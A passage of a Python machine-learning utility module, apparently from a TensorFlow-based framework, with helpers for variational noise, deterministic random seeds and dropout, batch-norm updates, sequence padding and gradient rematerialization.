tf.shape(x), stddev=1.0, seed=seed, dtype=x.dtype)
return x + noises
def AddGlobalVN(params, weights):
"""Adds variational noise to weights if specified by params."""
p = params
if p.vn.global_vn:
weights = _AddVN(p, weights)
return weights
def AddPerStepVN(params, weights, step=None):
"""Adds per-setp variational noise to weights if specified by params."""
p = params
if p.vn.per_step_vn:
weights = _AddVN(p, weights, step)
return weights
def VariationalNoiseParams(scale,
global_vn=False,
per_step_vn=False,
seed=None):
"""Returns a hyperparams for variational noise."""
p = hyperparams.Params()
p.Define(
'scale', scale,
'Std of the variational noise to apply . This can be a scalar,'
' or a scalar tensor.')
p.Define('global_vn', global_vn,
'Adds global variational noise every training setp iff True.')
p.Define('per_step_vn', per_step_vn,
'Adds per-timesetp variational noise iff True.')
p.Define('seed', seed, 'Random seed used to generate noise.')
return p
# To disable VN of a layer, we use 1.0 in the first input parameter
# of the following function because otherwise it is the same to DefaultVN()
# configuration of base_layer, which will be updated by parent configuration in
# CopyBaseParams()
def DisableVN():
return VariationalNoiseParams(1.0, False, False)
def GetStepSeed():
"""Gets step_seed."""
step_seed_tensors = tf.get_default_graph().get_collection_ref('step_seed')
if not step_seed_tensors:
ResetStepSeed()
return GetStepSeed()
elif len(step_seed_tensors) == 1:
return step_seed_tensors[0]
else:
raise ValueError('Multiple tensors in step_seed collection.')
def ResetStepSeed(seed=0):
"""Resets step_seed to specified value."""
new_step_seed = tf.convert_to_tensor(seed, dtype=tf.int64)
step_seed_tensors = tf.get_default_graph().get_collection_ref('step_seed')
if len(step_seed_tensors) == 1:
step_seed_tensors[0] = new_step_seed
elif not step_seed_tensors:
tf.add_to_collection('step_seed', new_step_seed)
else:
raise ValueError('Multiple tensors in step_seed collection.')
def GetIncStepSeed():
"""Returns and increments the step_seed."""
step_seed = GetStepSeed()
# TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
# independent of underlying PRNG used by tensorflow.
ResetStepSeed(step_seed + 1)
return step_seed
def GenerateStepSeedPair(p, global_step, op_seed=None):
"""Generates a seed pair for deterministic random operations in functional loops.
This function retrieves a unique seed pair on each call, based off the current
global step and step seed. The step seed ensures this function returns a
unique seed pair on each call: calling this function automatically increments
the step seed. The step seed is automatically reset at the beginning of each
global step in the model's FProp and works transparently through recurrent.py.
Args:
p: A hyperparams.Params object, containing keys 'random_seed' and
'is_inference'.
global_step: The global step.
op_seed: An additional operation-level seed to apply.
Returns:
A size 2 tensor of op seeds to use for stateless_random ops.
"""
seed_dtype = tf.int32 if use_tpu() else tf.int64
if p.is_inference and p.random_seed is None:
# Ensure GetIncStepSeed is called even inside the shortcut.
# This ensures if p.random_seed is set for other ops that use this function
# that they will get the same seed pair whether or not p.random_seed is set
# for this specific call.
GetIncStepSeed()
# Unlike tf.random*, stateless random ops are completely determined by the
# passed-in seeds. This means at inference time the same inputs will produce
# the same outputs, even if the model is supposed to have randomness such as
# dropout during inference. We inject additional randomness only during
# inference if the graph is exported with random_seed=None as a workaround.
return tf.random.uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
global_step = tf.cast(global_step, seed_dtype)
step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
seeds = tf.stack([global_step, step_seed])
if p.random_seed is not None:
seeds += p.random_seed
if op_seed is not None:
seeds += op_seed
return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
"""Similar to `tf.nn.dropout()`, but fully deterministic.
Args:
x: A float Tensor on which to apply dropout.
keep_prob: A scalar `Tensor` of keep probability.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated keep/drop flags.
name: An optional name for this operation.
Returns:
A Tensor with the same shape as `x`.
Raises:
InvalidArgumentError: if keep_prob is invalid.
"""
if isinstance(keep_prob, numbers.Real):
if keep_prob <= 0 or keep_prob > 1:
raise tf.errors.InvalidArgumentError(
'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
if keep_prob == 1:
return x
with tf.name_scope(name, 'dropout', [x]) as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
keep_prob = tf.convert_to_tensor(
keep_prob, dtype=tf.float32, name='keep_prob')
# uniform in [keep_prob, 1.0 + keep_prob)
# StatelessRandomUniform op does not support non-float (e.g. bfloat16) dtype
# and non-int32 seed types.
noise_shape = noise_shape or GetShape(x)
random_tensor = keep_prob + tf.random.stateless_uniform(
noise_shape, seed=seeds, dtype=tf.float32)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
if x.dtype != tf.float32:
binary_tensor = tf.cast(binary_tensor, x.dtype)
keep_prob = tf.cast(keep_prob, dtype=x.dtype)
result = tf.div(x, keep_prob) * binary_tensor
result.set_shape(x.get_shape())
return result
def DeterministicVN(params, seeds, noise_shape, mean=0.0, std=1.0, name=None):
"""Produces Fully deterministic Gaussian noise from shape, mean and std.
Args:
params: Nested map of params.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated Gaussian noise.
mean: Mean for the Gaussian noise.
std: Standard deviation for noise.
name: An optional name for this operation.
Returns:
A Tensor with the shape noise_shape and type fprop_dtype.
"""
with tf.name_scope(name, 'gaussian_noise') as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
random_tensor = mean + (
std * tf.random.stateless_normal(noise_shape, seed=seeds))
if FPropDtype(params) != tf.float32:
random_tensor = tf.cast(random_tensor, FPropDtype(params))
return random_tensor
BATCH_NORM_UPDATES = 'batch_norm_updates'
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
"""Update batch normalization moving averages."""
with tf.name_scope(
'AssignMovingAvg', values=[
batch_norm_var,
batch_norm_stats,
decay,
]) as scope:
with tf.ops.colocate_with(batch_norm_var):
decay = tf.convert_to_tensor(
1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
update_delta = (batch_norm_var - batch_norm_stats) * decay
has_nan_or_inf = tf.reduce_any(
tf.math.logical_or(
tf.math.is_nan(update_delta), tf.math.is_inf(update_delta)))
update_delta = tf.cond(has_nan_or_inf,
lambda: tf.zeros_like(update_delta),
lambda: update_delta)
bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
bn_update_dict = _get_batch_norm_updates_dict()
assert bn_update.name not in bn_update_dict
bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
"""Finds and returns a list of relevant batch-normalization updates.
Args:
loss: The loss that is being optimized for. A tensor or a list of tensors.
batch_norm_updates: A list of batch normalization updates.
Returns:
A pair of lists. The first list contains all the batch normalization updates
that are relevant to the loss being optimized, and the second list contains
all in batch_norm_updates but not in the first list.
"""
dependent_ops_and_tensors = set(FindNeeded(loss))
relevant_updates = []
irrelevant_updates = []
bn_update_dict = _get_batch_norm_updates_dict()
for bn_update in batch_norm_updates:
assert bn_update.name in bn_update_dict, (
'%s is probably not a valid batch normalization update op.'
' Make sure batch normalization is done through calling'
' the py_utils.UpdateBatchNormVars helper routine.')
bn_stat_name = bn_update_dict[bn_update.name][1].name
if bn_stat_name in dependent_ops_and_tensors:
# If a batch normalization stat is computed in the forward pass in
# computing loss, then the corresponding batch normalization update is
# relevant. Otherwise, it is not.
relevant_updates.append(bn_update)
else:
irrelevant_updates.append(bn_update)
return relevant_updates, irrelevant_updates
_SAMPLE_STEP_KEY = 'sample_step'
@contextlib.contextmanager
def SampleStep(step):
"""A context for a sample step during decoding.
Example usage::
with py_utils.SampleStep(step):
sample = self.DecodeOneStep()
Args:
step: the step tensor.
Yields:
a context manager for the step scope.
"""
stack = tf.get_collection_ref(_SAMPLE_STEP_KEY)
try:
stack.append(step)
yield step
finally:
stack.pop()
def _GetSampleStep():
stack = tf.get_collection(_SAMPLE_STEP_KEY)
return stack[-1] if stack else None
def AddDebugTensor(tensor, summarize=None, name=None):
"""Adds `tensor` to the debug collection.
Prints the tensor if `--print_debug_tensors` is True.
Args:
tensor: A tensor.
summarize: Only print this many entries of each tensor. If None, then a
maximum of 3 elements are printed per input tensor.
name: An optional name for the tensor.
Returns:
A Tensor that evaluates to the same value as the input tensor.
"""
if _FromGlobal('print_debug_tensors'):
step = _GetSampleStep()
tensors_to_print = ([] if step is None else [step]) + [tensor]
with tf.name_scope(name) as s:
tensor = tf.Print(
tensor,
tensors_to_print,
message='DEBUG tensor %s' % s,
name=name,
summarize=summarize)
return tensor
def ArgMax(inputs):
"""tf.argmax wrapper.
Args:
inputs: A tensor, whose last dimension is being reduced on.
Returns:
A tensor of rank tf.rank(logits)-1. If i == ret[indices],
logits[indices, i] is the maximum among logits[indices, :].
"""
if use_tpu():
return tf.argmax(inputs, axis=-1, output_type=tf.int32)
else:
return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
if x.shape.ndims is None:
x.set_shape([None, None])
else:
assert x.shape.ndims == 2
return x
def Matmul(x, y, *args, **kwargs):
"""tf.matmul wrapper expecting x and y are actually matrices."""
x = _EnsureMatrixShape(x)
y = _EnsureMatrixShape(y)
return tf.matmul(x, y, *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None): # pylint: disable=invalid-name
if t.dtype.is_complex:
return tf.complex(
tf.clip_by_value(
tf.math.real(t), clip_value_min, clip_value_max, '%s_real' % name),
tf.clip_by_value(
tf.math.imag(t), clip_value_min, clip_value_max, '%s_imag' % name))
return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
with tf.name_scope('TransformAndSum'):
sum_transform = []
for t in tensor_list:
with tf.device(t.device):
if isinstance(t, tf.IndexedSlices):
sum_transform += [tf.reduce_sum(transform(t.values))]
else:
sum_transform += [tf.reduce_sum(transform(t))]
return tf.add_n(sum_transform)
def SumSquared(tensor_list):
return _TransformAndSum(tensor_list, lambda v: tf.abs(v)**2)
def SumAbs(tensor_list):
return _TransformAndSum(tensor_list, tf.abs)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
"""Returns the piecewise value of x_in."""
x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
assert len(values) == len(boundaries) + 1
assert sorted(boundaries) == list(boundaries)
bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
vs = tf.convert_to_tensor(values, dtype=vdtype)
# The following is equivalent to 'return vs[index]'.
index = tf.reduce_sum(tf.cast(tf.greater_equal(x_in, bs), tf.int32))
one_hot_vec = tf.one_hot(
tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
def PadSequenceDimension(x, length, pad_val, shape=None):
"""Pads x to `length` using `pad_val` along the second dim.
Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
along the second dim. Explicitly sets the returned tensor shape to `shape` if
given. Raises runtime errors if x.shape[1] > length or x.shape[i] != shape[i]
where i != 1.
Args:
x: the tensor to be padded with shape [batch, seq_len, ...].
length: an int to specify the length to pad x to.
pad_val: an int or float used to pad x.
shape: an int array specifying the shape of the padded tensor if specified.
Returns:
The padded tensor with shape [batch, seq_len, ...], where
ret[:, :seq_len, ...] == x.
"""
if x.shape.ndims is not None:
rank = x.shape.ndims
assert rank >= 2
slen = GetShape(x, rank)[1]
pad_len = length - slen
pad = [[0, 0] for _ in range(rank)]
pad[1][1] = pad_len
else:
rank = tf.rank(x)
with tf.control_dependencies([assert_greater_equal(rank, 2)]):
slen = tf.shape(x)[1]
pad_len = length - slen
pad = tf.scatter_nd([[1, 1]], [pad_len], [rank, 2])
x = tf.pad(x, pad, constant_values=pad_val)
if x.shape.ndims is not None and isinstance(length, int):
static_shape = x.shape.as_list()
static_shape[1] = length
x.set_shape(static_shape)
if shape:
if not isinstance(shape, (list, tuple)):
raise TypeError('Shape must be a list or tuple.')
x = HasRank(x, len(shape))
x = tf.ensure_shape(x, shape)
return x
def PadSequenceTo(xs, padding, length, pad_val):
"""Pads `xs` and `padding` to `length` using `pad_val` along the 2nd dim.
Pads `xs` to `length` using `pad_val`, and `padding` using 1.
Raise error if `x.shape[:2]` and `padding.shape` are not the same.
Args:
xs: A Tensor or a list of Tensors of shape [batch, seqlen] or [batch,
seqlen, ...].
padding: A 0/1 Tensor of shape [batch, seqlen]. 1 is for padded locations.
length: A Python int, the length to pad to.
pad_val: A Python numeric, used for padding x.
Returns:
A tuple of padded xs and padding.
"""
if not isinstance(xs, (list, tuple)):
new_xs = [xs]
else:
new_xs = xs
res = []
for x in new_xs:
batch, slen = GetShape(x, 2)
padding = HasRank(padding, 2)
padding = HasShape(padding, [batch, slen])
new_x = PadSequenceDimension(x, length, pad_val)
res.append(new_x)
padding = PadSequenceDimension(padding, length, tf.cast(1, padding.dtype))
if not isinstance(xs, (list, tuple)):
assert len(res) == 1
return res[0], padding
else:
return tuple(res), padding
def ApplyPadding(padding, x, padded=None, broadcast=True, use_select=True):
"""Applies padding to a tensor.
This is preferable to using arithmetic means for masking out padded values
such as::
# Equiv to ApplyPadding(padding, x))
x *= 1.0 - padding
# Equiv to ApplyPadding(padding, new, old)
new = old * padding + new * (1 - padding)
Aside from just being easier to read and reason about, using this function
is friendly to quantized representations because it does not mix arithmetic
on the padding values with the values in the tensor being padded (which can
have a very different range than the 0..1 padding tensor).
In addition, this works around issues in quantized schemes where we are
guaranteed to have an exact 0 but not necessarily any other number (i.e. 1).
Args:
padding: Tensor of padding values where 0 == keep and 1 == pad.
x: Tensor to apply padding to.
padded: Optional. Values to include for padded elements. Defaults to zeros.
Must be the same shape as 'x' if specified.
broadcast: Whether to broadcast the padding shape to the shape of 'x'. You
almost certainly want this to be true as it matches how padding would be
expanded if applied arithmetically.
use_select: Controls whether padding is applied with a select-mask
(True/default) or arithmetically (False). Some platforms have a
sensitivity to one or the other and this is used to work around such
issues.
Returns:
A tensor with the same shape as x with padded values masked.
"""
padding = with_dependencies([
Assert(
tf.reduce_all(
tf.math.logical_or(
tf.equal(padding, 0.0), tf.equal(padding, 1.0))), [padding])
], padding)
if use_select:
if padded is None:
padded = tf.zeros_like(x)
if broadcast:
# Broadcast padding to the full shape.
padding = tf.cast(padding, x.dtype) * tf.ones_like(x)
return tf.where(padding > tf.zeros_like(padding), padded, x)
else:
result = x * tf.cast(1.0 - padding, x.dtype)
if padded is not None:
result += padded * tf.cast(padding, padded.dtype)
return result
def LengthsFromPaddings(paddings):
"""Computes lengths of each sequence in a batch, ignoring trailing padding.
Args:
paddings: a tensor with shape [batch, length].
Returns:
lengths tensor shaped [batch] containing the unpadded length of each
sequence in the batch.
"""
paddings = HasRank(paddings, 2)
paddings = tf.cast(paddings, tf.int32)
# Find the last unpadded value.
# Cannot just use tf.reduce_sum because there might be leading paddings.
# Everything after the last unpadded value has 1.0 - paddings == 0.0, so in
# the cumsum below they will have the same value.
cumsum = tf.cumsum(1 - paddings, axis=1)
same_as_last_element = tf.equal(cumsum, cumsum[:, -1:])
# Counting the number of elements with the same value gives us num_padded + 1
# and so counting the number that differs gives us num_padded - 1.
length = tf.reduce_sum(
1 - tf.cast(same_as_last_element, tf.int32), axis=1) + 1
# Special case for all 0 paddings.
all_zero_paddings = tf.equal(tf.reduce_sum(1 - paddings, axis=1), 0)
return tf.where(all_zero_paddings, tf.zeros_like(length), length)
def TrimTrailingPaddings(inputs, paddings):
"""Trims trailing paddings from inputs.
Since the number of dimensions is not fixed, this will not work on TPU.
Args:
inputs: a tensor with shape [batch, length, ...].
paddings: a tensor with shape [batch, length].
Returns:
Trimmed inputs and paddings. For compatibility reasons, the trimmed tensors
will always have length at least 1.
"""
paddings = HasRank(paddings, 2)
max_length = tf.maximum(tf.reduce_max(LengthsFromPaddings(paddings)), 1)
output_shape = tf.shape(inputs)
output_shape = tf.concat([[output_shape[0], max_length], output_shape[2:]],
axis=0)
outputs = tf.slice(inputs, tf.zeros_like(output_shape), output_shape)
out_paddings = tf.slice(paddings, [0, 0],
tf.stack([output_shape[0], max_length]))
return outputs, out_paddings
def ReversePaddedSequence(inputs, paddings):
"""Reverse inputs based on paddings.
Only reverse the unpadded portion of `inputs`. It assumes inputs are only
padded in the end.
Args:
inputs: a tensor of [seq_length, batch_size, num_input_nodes].
paddings: a tensor of float32/float64 zero or one of shape [seq_length,
batch_size, 1].
Returns:
A reversed tensor of the same shape as `inputs`.
"""
inversed_paddings = 1.0 - tf.squeeze(paddings, 2)
inputs_length = tf.cast(
tf.math.rint(tf.reduce_sum(inversed_paddings, axis=0)), tf.int32)
return tf.reverse_sequence(inputs, inputs_length, seq_axis=0, batch_axis=1)
def ConcatenatePaddedSequences(input0, input1, padding0, padding1, seq_dim=1):
"""Concatenates input sequences with varying lenghts as defined by paddings.
This is a helper function for concatenating 2 batches of input sequences,
where each example in the batch can have different lengths, as defined by
the corresponding paddings. To concatenate correctly, it makes use of
tf.reverse_sequence to partially reverse the sequences before
concatenating them together.
NOTE: We assume that the tensors have no leading paddings.
Args:
input0: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
input1: A tensor of size [batch, max_length, ...] or [max_length, batch,
...] depending on the value set for axis.
padding0: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input0.
padding1: A Tensor of size [batch, max_length] or [max_length, batch]
corresponding to the padding for input1.
seq_dim: int, the time axis along which the tensors will be concatenated.
Should be 0 or 1. Assumes that batch_dim is 1 - seq_dim.
Returns:
The concatenation of input0 and input1, and the corresponding padding.
Raises:
tf.errors.InvalidArgumentError when seq_dim is not 0 or 1.
"""
if seq_dim != 0 and seq_dim != 1:
raise tf.errors.InvalidArgumentError(None, None, 'seq_dim must be 0 or 1.')
batch_dim = 1 - seq_dim
# inpu0 and input1 should have the same batch size and same rank.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim],
GetShape(input1)[batch_dim]),
assert_equal(GetRank(input0), GetRank(input1))
], input0)
batch_size = GetShape(padding0)[batch_dim]
# batch dimension of inputs and paddings should match.
input0 = with_dependencies([
assert_equal(GetShape(input0)[batch_dim], batch_size),
assert_equal(GetShape(padding1)[batch_dim], batch_size)
], input0)
input0_seq_dim = tf.cast(
tf.tile([tf.shape(padding0)[seq_dim]], [batch_size]), dtype=tf.int32)
input1_seq_dim = tf.cast(
tf.tile([tf.shape(padding1)[seq_dim]], [batch_size]), dtype=tf.int32)
# LengthsFromPaddings assumes that paddings is of size [batch, max_length].
if seq_dim == 1:
seq_length0 = LengthsFromPaddings(padding0)
seq_length1 = LengthsFromPaddings(padding1)
else:
seq_length0 = LengthsFromPaddings(tf.transpose(padding0))
seq_length1 = LengthsFromPaddings(tf.transpose(padding1))
# We assume that the tensors have no leading paddings.
# TODO(arunnt): Concatenate tensors with leading paddings correctly.
seq_length0 = with_dependencies([
assert_equal(
seq_length0,
tf.cast(tf.reduce_sum(1.0 - padding0, seq_dim), dtype=tf.int32))
], seq_length0)
seq_length1 = with_dependencies([
assert_equal(
seq_length1,
tf.cast(tf.reduce_sum(1.0 - padding1, seq_dim), dtype=tf.int32))
], seq_length1)
# Concatenate input sequences.
reversed_input0 = tf.reverse_sequence(
input0, seq_length0, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_input1 = tf.reverse_sequence(
input1, input1_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat = tf.concat([reversed_input1, reversed_input0], axis=seq_dim)
concat_inputs = tf.reverse_sequence(
reversed_concat,
seq_length0 + input1_seq_dim,
seq_axis=seq_dim,
batch_axis=batch_dim)
# Concatenate paddings. Note that paddings are always a Tensor of 0s and 1s,
# so, unlike the inputs, we don't have to reverse padding1, we can simply
# concatenate reversed padding0 and padding1.
reversed_padding0 = tf.reverse_sequence(
padding0, input0_seq_dim, seq_axis=seq_dim, batch_axis=batch_dim)
reversed_concat_padding = tf.concat([reversed_padding0, padding1],
axis=seq_dim)
concat_paddings = tf.reverse_sequence(
reversed_concat_padding,
input0_seq_dim + seq_length1,
seq_axis=seq_dim,
batch_axis=batch_dim)
return concat_inputs, concat_paddings
def Retry(*args, **kwargs):
return retry.Retry(*args, **kwargs)
# FailedPreconditionError: variables are not initialized.
# AbortedError: processes restarts.
# UnavailableError: Bad hardware status: 0x1
transient_tf_errors = (tf.errors.FailedPreconditionError,
tf.errors.AbortedError, tf.errors.UnavailableError)
def RetryOnTransientTfError(*args, **kwargs):
return Retry(transient_tf_errors, *args, **kwargs)
def PadOrTrimTo(x, shape, pad_val=0, pad_after_contents=True):
"""Pad and slice x to the given shape.
Args:
x: A tensor.
shape: The shape of the returned tensor.
pad_val: An int or float used to pad x.
pad_after_contents: Whether to pad and trim after the original contents
of each dimension.
Returns:
'x' is padded with pad_val and sliced so that the result has the given
shape.
Raises:
ValueError: if shape is a tf.TensorShape and not fully defined.
"""
if isinstance(shape, (list, tuple)):
expected_rank = len(shape)
elif isinstance(shape, tf.TensorShape):
if not shape.is_fully_defined():
raise ValueError('shape %s padding %s must be fully defined.' %
(shape, x))
expected_rank = shape.rank
else:
shape = HasRank(shape, 1)
expected_rank = tf.size(shape)
x = HasRank(x, expected_rank)
pad = shape - tf.minimum(tf.shape(x), shape)
zeros = tf.zeros_like(pad)
if pad_after_contents:
# If dim_i is less than shape[i], pads after contents.
paddings = tf.stack([zeros, pad], axis=1)
# If dim_i is larger than shape[i], we slice [0:shape[i]] for dim_i.
slice_begin = zeros
else:
# If dim_i is less than shape[i], pads before contents.
paddings = tf.stack([pad, zeros], axis=1)
# If dim-i is larger than shape[i], we slice [dim_i - shape[i]:dim_i]
# for dim_i.
slice_begin = tf.shape(x) + pad - shape
x = tf.pad(x, paddings, constant_values=pad_val)
x = tf.slice(x, slice_begin, shape)
return tf.reshape(x, shape)
def RepeatDim(tensor, multiple, axis):
"""Copies elements in tensor's axis "multiple" times, like np.repeat."""
# x = [[1, 2, 3], [4, 5, 6]]
# RepeatDim(x, multiple=2, axis=1) gives:
# [[1, 1, 2, 2, 3, 3]. [4, 4, 5, 5, 6, 6]]
# As a comparison tf.tile(x, multiples=[1, 2]) gives:\
# [[1, 2, 3, 1, 2, 3], [4, 5, 6, 4, 5, 6]]
if multiple == 1:
return tensor
t_shape = tf.shape(tensor)
tensor_dims = tf.concat(
[t_shape[:axis], [t_shape[axis] * multiple], t_shape[axis + 1:]], 0)
multiple_dims = tf.concat([
tf.fill([axis + 1], 1), [multiple],
tf.fill([tf.rank(tensor) - axis - 1], 1)
], 0)
return tf.reshape(
tf.tile(tf.expand_dims(tensor, axis + 1), multiple_dims), tensor_dims)
def StackTensorsRecursively(values):
"""Recursively stacks Tensors in a list of `.NestedMap`.
Args:
values: a list of `.NestedMap` or Tensors to stacks.
Returns:
A `.NestedMap` with stacked values or a stacked Tensor.
"""
flatten = [w.Flatten() for w in values]
stacked = []
for i in range(len(flatten[0])):
stacked += [tf.stack([flatten[j][i] for j in range(len(flatten))])]
ret = values[0].Pack(stacked)
return ret
def MixByWeight(inputs, weights, seed=None):
"""Returns a weighted random choice and bprop type from the give inputs.
Args:
inputs: a list of callables, where each callable returns a tf.Tensor or a
nested structure containing tf.Tensor. Function return types must be
consistent across elements. The tf.Operation to compute the result tensor
will only be invoked for one input at a time. For example, if each fn
represents an input record stream, a record will be drawn only from a
selected stream while the other streams will remain unchanged.
weights: a 1D tensor of float > 0 of the same length as inputs.
seed: random seed.
Returns:
A probablistic sample from the inputs proportional to the weights. The
return type will be the same as return type of individual 'fn' from the
inputs.
A one-hot vector of the source selected.
"""
weights = tf.convert_to_tensor(weights, dtype=tf.float32)
weights = with_dependencies([
assert_equal(tf.shape(weights), [len(inputs)]),
assert_greater_equal(tf.reduce_min(weights), 0.0)
], weights)
lower = tf.cumsum(weights, exclusive=True)
upper = tf.cumsum(weights, exclusive=False)
r = tf.random.uniform(shape=[], maxval=upper[-1], seed=seed)
return_input = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), inputs[i])
for i in range(len(inputs))],
exclusive=True)
selected_index = tf.case(
[(tf.math.logical_and(lower[i] <= r, r < upper[i]), lambda i=i: i)
for i in range(len(inputs))],
exclusive=True)
bprop_index = tf.one_hot(selected_index, len(inputs), dtype=tf.float32)
return return_input, bprop_index
def CheckShapes(shapes):
"""Asserts that shapes is a tuple of NestedMap or tshape.Shape."""
assert isinstance(shapes, tuple), str(shapes)
for s in shapes:
if isinstance(s, NestedMap):
assert all([isinstance(t, tshape.Shape) for t in Flatten(s)
]), '{} contains non-tensor value.'.format(s)
else:
assert isinstance(s, tshape.Shape), '{}: {}'.format(type(s), s)
def FPropDtype(params):
return params.fprop_dtype if params.fprop_dtype is not None else params.dtype
def UpdateFpropDtype(params, fprop_dtype):
"""Recursively update the fprop_dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateFpropDtype(val, fprop_dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateFpropDtype(item, fprop_dtype)
elif key == 'fprop_dtype':
params.fprop_dtype = fprop_dtype
def UpdateDtype(params, dtype):
"""Recursively update the dtype of the Params."""
# Handle the case when the input "params" is not an instance of hyperparams
# For example, when UpdateDtype is called recursively for all the items in
# the "sub" list of SequentialLayer (see 1st elif below)
if not isinstance(params, hyperparams.Params):
return
for key, val in params.IterParams():
if isinstance(val, hyperparams.Params):
UpdateDtype(val, dtype)
elif isinstance(val, (list, tuple)):
for item in val:
UpdateDtype(item, dtype)
elif key == 'dtype':
params.dtype = dtype
def NameScopeDecorator(name_scope):
"""Decorates a python function to introduce a tf.name_scope.
Example::
@py_utils.NameScopeDecorator('foobar')
def MyFoobarMethod(self):
# ... Do TF things
Args:
name_scope: The name scope to introduce.
Returns:
A function decorator.
"""
def Decorator(f):
def Wrapped(*args, **kwargs):
with tf.name_scope(name_scope):
return f(*args, **kwargs)
return Wrapped
return Decorator
def SequencesToDebugStrings(ids, lens, summarize=5):
"""Returns debug strings for the given sequences.
Args:
ids: int32 of [batch, len].
lens: int32 of [batch].
summarize: number of ids to summarize per sequence.
Returns:
A string tensor of [batch].
"""
num_seqs = tf.shape(lens)[0]
def _Body(i, result):
line = tf.strings.format('{}', ids[i, :lens[i]], summarize=summarize)
return i + 1, tf.concat([result, tf.reshape(line, [1])], axis=0)
i0 = tf.zeros(shape=[], dtype=tf.int32)
result0 = tf.constant('', shape=[0], dtype=tf.string)
_, strs = tf.while_loop(
lambda i, result: i < num_seqs,
_Body, (i0, result0),
shape_invariants=(i0.shape, tf.TensorShape([None])))
return strs
def RematerializeFn(fn, *xs):
"""Calls fn and rematerializes fn in the backward pass.
`fn(*xs) -> ys`, where xs and ys can be a single tensor or a tuple of tensors.
Args:
fn: A python function to be rematerialized in the backprop pass.
*xs: A single tensor or a list/tuple of tensors. `xs` are input args to the
fn function.
Returns:
`fn(*xs)`
"""
initial_step_seed = GetStepSeed()
final_step_seed = GenerateSeedFromName(tf.no_op(name='new_step_seed').name)
def Backward(op, *dy):
"""The backward function that rematerializes forward outputs."""
always_true = tf.random.uniform([]) < 2.0
# Alternatively, can do this:
# tf.where(tf.math.is_nan(x),
# tf.constant(float('nan'), dtype=x.dtype) * tf.ones_like(x),
# x)
# Skip op.inputs[0] which is initial_step_seed.
bak_xs = [tf.where(always_true, x, tf.zeros_like(x)) for x in op.inputs[1:]]
for dst, src in zip(bak_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*bak_xs)
ResetStepSeed(final_step_seed)
dxs = tf.gradients(ys, bak_xs, grad_ys=dy)
dxs_final = []
for dx, x in zip(dxs, bak_xs):
if dx is None:
dxs_final.append(tf.zeros_like(x))
else:
dxs_final.append(dx)
assert len(dxs_final) == len(bak_xs)
return (tf.zeros_like(initial_step_seed),) + tuple(dxs_final)
xs_dtypes = [x.dtype for x in xs]
ys_shapes = []
# TODO(huangyp, yonghui): Check Forward doesn't use any stateful random ops.
@tf.Defun(initial_step_seed.dtype, *xs_dtypes, python_grad_func=Backward)
def Forward(initial_step_seed, *fwd_xs):
"""Forward function plus sanity checks."""
for dst, src in zip(fwd_xs, xs):
dst.set_shape(src.shape)
ResetStepSeed(initial_step_seed)
ys = fn(*fwd_xs)
# Some sanity check.
assert not GetExtraInputs()
assert not GetExtraArgs()
assert not GetExtraVars()
if isinstance(ys, tuple):
for y in ys:
assert isinstance(y, tf.Tensor)
ys_shapes.append(y.shape)
else:
assert isinstance(ys, tf.Tensor)
ys_shapes.append(ys.shape)
return ys
ys = Forward(initial_step_seed, *xs)
if isinstance(ys, tuple):
for y, s in zip(ys, ys_shapes):
y.set_shape(s)
else:
ys.set_shape(ys_shapes[0])
# TODO(b/129159299): The ResetStepSeed below is needed to work around this
# bug, which is a problem with global tensors being shared by different
# inference graphs. It should be replaced with the new step seed value
# returned from the Forward function when the bug is fixed.
ResetStepSeed(final_step_seed)
return ys
# A set of names of stateful random number generator ops.
# See tensorflow/core/ops/random_ops.cc
_STATEFUL_RANDOM_OPS = {
# pyformat: disable
'RandomUniform',
'RandomUniformInt',
'RandomStandardNormal',
'ParameterizedTruncatedNormal',
'TruncatedNormal',
'RandomShuffle',
'Multinomial',
'RandomGamma',
'RandomPoisson',
'RandomPoissonV2',
# pyformat: enable
}
def StatefulRandomOpsInDefun(func, graph=None):
